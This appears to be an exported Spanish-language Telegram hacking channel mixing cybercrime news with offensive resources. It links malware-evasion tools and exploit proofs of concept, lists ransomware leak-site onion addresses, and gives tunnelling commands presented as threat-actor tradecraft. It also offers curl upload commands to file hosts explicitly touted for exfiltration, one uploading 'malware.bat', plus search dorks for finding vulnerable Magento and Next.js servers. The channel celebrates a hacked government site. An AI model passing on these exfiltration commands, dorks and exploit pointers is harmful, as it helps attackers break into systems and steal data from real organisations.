🛡 GoDefender 🛡
Anti Virtulization, Anti Debugging, AntiVM, Anti Virtual Machine, Anti Debug, Anti Sandboxie, Anti Sandbox, VM Detect package. Windows ONLY.
https://github.com/EvilBytecode/GoDefender
#maldev #bypassav #github
Anti Virtulization, Anti Debugging, AntiVM, Anti Virtual Machine, Anti Debug, Anti Sandboxie, Anti Sandbox, VM Detect package. Windows ONLY.
https://github.com/EvilBytecode/GoDefender
#maldev #bypassav #github
GitHub
GitHub - EvilBytecode/GoDefender: Anti Virtulization, Anti Debugging, AntiVM, Anti Virtual Machine, Anti Debug, Anti Sandboxie…
Anti Virtulization, Anti Debugging, AntiVM, Anti Virtual Machine, Anti Debug, Anti Sandboxie, Anti Sandbox, VM Detect package. Windows ONLY. - EvilBytecode/GoDefender
👏7
Prueba de concepto de CVE-2025-9491 utilizando caracteres invisibles en los argumentos de un archivo de acceso directo de Windows (.lnk)
https://github.com/Amperclock/CVE-2025-9491_POC
#github #poc #exploit #cve
https://github.com/Amperclock/CVE-2025-9491_POC
#github #poc #exploit #cve
GitHub
GitHub - Amperclock/CVE-2025-9491_POC: Proof-of-Concept of the CVE-2025-9491 using invisible characters in the arguments of a Windows…
Proof-of-Concept of the CVE-2025-9491 using invisible characters in the arguments of a Windows shortcut file (.lnk) - Amperclock/CVE-2025-9491_POC
❤6
Ryūjin Protector 🛡
Ryūjin Protector is an open-source Bin2Bin obfuscation, protection, and DRM tool for Windows PE binaries targeting the Intel x64 architecture (x86_64 only).
https://github.com/keowu/Ryujin
#bypassav #maldev #github
Ryūjin Protector is an open-source Bin2Bin obfuscation, protection, and DRM tool for Windows PE binaries targeting the Intel x64 architecture (x86_64 only).
https://github.com/keowu/Ryujin
#bypassav #maldev #github
🔥9
Organismo gubernamental peruano golpeado por Ransomware 🇵🇪🔐
La pandilla de Ransomware Black Shrantac la cual es relativamente
nueva dentro de la escena Ransomware, ha golpeado a la
Superintendencia Nacional de Fiscalización Laboral de Peru
logrando exfiltrar 200GB de datos de la organización.
http://b2ykcy2gcug4gnccm6hnrb5xapnresmyjjqgvhafaypppwgo4feixwyd.onion/targets/31
#peru #ransomware #onion #fuckgob
La pandilla de Ransomware Black Shrantac la cual es relativamente
nueva dentro de la escena Ransomware, ha golpeado a la
Superintendencia Nacional de Fiscalización Laboral de Peru
logrando exfiltrar 200GB de datos de la organización.
http://b2ykcy2gcug4gnccm6hnrb5xapnresmyjjqgvhafaypppwgo4feixwyd.onion/targets/31
#peru #ransomware #onion #fuckgob
❤8👏1
CHAOS RANSOMWARE 🔐
http://hptqq2o2qjva7lcaaq67w36jihzivkaitkexorauw7b2yul2z6zozpqd.onion/
#ransomware #onion
http://hptqq2o2qjva7lcaaq67w36jihzivkaitkexorauw7b2yul2z6zozpqd.onion/
#ransomware #onion
👍3
Tunneling usando Cloudflared - Exponiendo servidor local a la internet 🛠
Hoy vamos usar una herramienta la cual hoy en día esta siendo abusada por varios actores de amenaza para montar RATs y para Phishing. Cloudflared es una herramienta creada para desarrolladores fue creada por la emmpresa Cloudflare.
Descarga de Cloudflared he instalacion
Iniciando servidor local (Nginx)
Exponiendo nuestro servidor a la internet
#tutoriales #manual #tunneling #hacking
Hoy vamos usar una herramienta la cual hoy en día esta siendo abusada por varios actores de amenaza para montar RATs y para Phishing. Cloudflared es una herramienta creada para desarrolladores fue creada por la emmpresa Cloudflare.
Descarga de Cloudflared he instalacion
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb && sudo dpkg -i cloudflared-linux-amd64.deb
Iniciando servidor local (Nginx)
sudo service nginx start
Exponiendo nuestro servidor a la internet
cloudflared tunnel --url http://localhost
#tutoriales #manual #tunneling #hacking
❤13
Tunneling usando Serveo - Exponiendo servidor local a la internet 🛠
En esta ocasión vamos a usar otro servicio el cual es ampliamente usando para exponer servicio web de servidores victimas, no quiere instalación ni logeo lo que lo convierte en un servicio muy útil para actores de amenaza.
Estoy hablando de serveo.net en el cual solo se requiere ssh instalado, por ejemplo vamos a exponer nuestro servidor local.
Iniciar servidor
Exponiendo servidor
Nota: serveo.net no siempre se encuentra online
#manual #tunneling #hacking
En esta ocasión vamos a usar otro servicio el cual es ampliamente usando para exponer servicio web de servidores victimas, no quiere instalación ni logeo lo que lo convierte en un servicio muy útil para actores de amenaza.
Estoy hablando de serveo.net en el cual solo se requiere ssh instalado, por ejemplo vamos a exponer nuestro servidor local.
Iniciar servidor
sudo service nginx start
Exponiendo servidor
ssh -R 80:localhost:80 serveo.net
Nota: serveo.net no siempre se encuentra online
#manual #tunneling #hacking
❤8🤔1
Se revela la identidad de "Rey" administrador de Scattered LAPSUS$ Hunters y Hackers miembro de la pandilla de Ransomware Hellcat 🚨
• La identidad real de Rey es Saif Al-Din Khader, quien se cree que vive en Amán, Jordania.
• Antes de liderar SLSH, Rey supuestamente administraba un sitio web de filtraciones de un grupo de ransomware y gestionaba versiones de BreachForums, lo que demuestra sus profundos vínculos con la infraestructura clandestina del cibercrimen.
• La revelación de la identidad de Rey se debe a fallos en su OPSEC: los investigadores utilizaron datos de credenciales filtrados, registros de «infostealer» y una combinación única de correo electrónico y contraseña vinculada a su alias para confirmar el vínculo con su identidad real.
• Según el artículo, Rey afirma que está «intentando limpiar todo lo que me relaciona con ello y seguir adelante», y dice que lleva cooperando con las fuerzas del orden al menos desde junio de 2025.
• La identidad real de Rey es Saif Al-Din Khader, quien se cree que vive en Amán, Jordania.
• Antes de liderar SLSH, Rey supuestamente administraba un sitio web de filtraciones de un grupo de ransomware y gestionaba versiones de BreachForums, lo que demuestra sus profundos vínculos con la infraestructura clandestina del cibercrimen.
• La revelación de la identidad de Rey se debe a fallos en su OPSEC: los investigadores utilizaron datos de credenciales filtrados, registros de «infostealer» y una combinación única de correo electrónico y contraseña vinculada a su alias para confirmar el vínculo con su identidad real.
• Según el artículo, Rey afirma que está «intentando limpiar todo lo que me relaciona con ello y seguir adelante», y dice que lleva cooperando con las fuerzas del orden al menos desde junio de 2025.
😱6
🎅FSEC INTEL ES 2.0 📡 🏴☠️🎄
Se revela la identidad de "Rey" administrador de Scattered LAPSUS$ Hunters y Hackers miembro de la pandilla de Ransomware Hellcat 🚨 • La identidad real de Rey es Saif Al-Din Khader, quien se cree que vive en Amán, Jordania. • Antes de liderar SLSH,…
Krebs on Security
Meet Rey, the Admin of ‘Scattered Lapsus$ Hunters’
A prolific cybercriminal group that calls itself "Scattered LAPSUS$ Hunters" made headlines regularly this year by stealing data from and publicly mass extorting dozens of major corporations. But the tables seem to have turned somewhat for "Rey," the moniker…
Media Land LLC un Hosting a prueba de bala ruso fue sancionado por presuntamente apoyar operaciones de Ransomware y redes de Botnets. 🚨🇷🇺
Las autoridades lograron identificar a 3 personas claves dentro de la empresa rusa, Aleksandr Volosovik director general de Media Land, Kirill Zatolokin (Zatolokin) encargado de recibir los pagos y coordinar con actores de amenaza, Yulia Pankova (Pankova) está al tanto de la actividad ilícita de Volosovik, ha ayudado a Volosovik con cuestiones legales y ha manejado sus finanzas.
Como resultado de las sanciones los bienes dentro de los EEUU de Media Land serán confiscados.
https://home.treasury.gov/news/press-releases/sb0319
#rusia #busted
Las autoridades lograron identificar a 3 personas claves dentro de la empresa rusa, Aleksandr Volosovik director general de Media Land, Kirill Zatolokin (Zatolokin) encargado de recibir los pagos y coordinar con actores de amenaza, Yulia Pankova (Pankova) está al tanto de la actividad ilícita de Volosovik, ha ayudado a Volosovik con cuestiones legales y ha manejado sus finanzas.
Como resultado de las sanciones los bienes dentro de los EEUU de Media Land serán confiscados.
https://home.treasury.gov/news/press-releases/sb0319
#rusia #busted
👍5🔥2❤1
DIREWOLF Ransomware 🔐
http://direwolfcdkv5whaz2spehizdg22jsuf5aeje4asmetpbt6ri4jnd4qd.onion/
#onion #ransomware
http://direwolfcdkv5whaz2spehizdg22jsuf5aeje4asmetpbt6ri4jnd4qd.onion/
#onion #ransomware
🔥10
Forwarded from Freedom Fox 🏴☠
#Exploit для CVE-2025-54236 (SessionReaper) - Unauthenticated #RCE в Magento
https://github.com/rapid7/metasploit-framework/pull/20725
Netlas.io: tag.name:"magento" AND http.headers.server:"Apache"
FOFA: app="Magento"
HUNTER : product.name="Adobe Magento"
ZoomEye Dork: app="Magento"
Telegram✉️ @freedomfox
https://github.com/rapid7/metasploit-framework/pull/20725
Netlas.io: tag.name:"magento" AND http.headers.server:"Apache"
FOFA: app="Magento"
HUNTER : product.name="Adobe Magento"
ZoomEye Dork: app="Magento"
Telegram
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7
Benzona Ransomware 🔐
http://benzona6x5ggng3hx52h4mak5sgx5vukrdlrrd3of54g2uppqog2joyd.onion/
#ransomware #onion
http://benzona6x5ggng3hx52h4mak5sgx5vukrdlrrd3of54g2uppqog2joyd.onion/
#ransomware #onion
🔥6
Servicio de Hosting File para subir ficheros desde la terminal util para exfiltracion ;) ⬆️🏴☠️
File.io
Limite de subida: 2GB
Tiempo de expiracion de fichero: 14 dias
https://file.io
Comando:
uguu.se
Limite de subida: 64MB
Tiempo de expiracion de fichero: 3 horas
https://uguu.se/
Comando:
temp.sh
Limite de subida: 4GB
Tiempo de expiracion de fichero: 3 dias
https://temp.sh/
Comando:
#tools #resources #terminal #exfiltracion
File.io
Limite de subida: 2GB
Tiempo de expiracion de fichero: 14 dias
https://file.io
Comando:
curl -F "file=@malware.bat" https://file.io
uguu.se
Limite de subida: 64MB
Tiempo de expiracion de fichero: 3 horas
https://uguu.se/
Comando:
curl -i -F files[]=@yourfile.jpeg https://uguu.se/upload
temp.sh
Limite de subida: 4GB
Tiempo de expiracion de fichero: 3 dias
https://temp.sh/
Comando:
curl -F "file=@test.txt" https://temp.sh/upload
#tools #resources #terminal #exfiltracion
www.file.io
file.io - Super simple file sharing
Sharing files with file.io is convenient, anonymous and secure. Just upload files and share the links via email, SMS, Slack, Discord, etc. Easy-to-use REST API.
❤9
🚨Exploit RCE en React (CVE-2025-55182)🏴☠️
Esta vulnerabilidad afecta a React Server Components (RSC) y los marcos que los implementan, particularmente Next.js. La vulnerabilidad, denominada “React2Shell” por los investigadores, permite la ejecución remota de código no autenticado a través de una única consulta HTTP.
🔍 DORKS
FOFA
ZOOMEYE
💣 EXPLOIT/Scanner
https://github.com/sumanrox/rschunter
#dorks #exploit #rce #github
Esta vulnerabilidad afecta a React Server Components (RSC) y los marcos que los implementan, particularmente Next.js. La vulnerabilidad, denominada “React2Shell” por los investigadores, permite la ejecución remota de código no autenticado a través de una única consulta HTTP.
🔍 DORKS
FOFA
app="NEXT.JS" || app="React.js"
ZOOMEYE
http.body="react.production.min.js" http.body="React.createElement(" app="React Router" app="React.js" app="next.js"💣 EXPLOIT/Scanner
https://github.com/sumanrox/rschunter
#dorks #exploit #rce #github
GitHub
GitHub - sumanrox/rschunter: Mass Hunting & Exploitation PoC for CVE-2025-55182 & CVE-2025-66478
Mass Hunting & Exploitation PoC for CVE-2025-55182 & CVE-2025-66478 - sumanrox/rschunter
❤5
🎅FSEC INTEL ES 2.0 📡 🏴☠️🎄
🚨Exploit RCE en React (CVE-2025-55182)🏴☠️ Esta vulnerabilidad afecta a React Server Components (RSC) y los marcos que los implementan, particularmente Next.js. La vulnerabilidad, denominada “React2Shell” por los investigadores, permite la ejecución remota…
Y ya tenemos nuestro primer .gob pwneado, como amo los RCE 😁❤️🏴☠️
🔥12❤3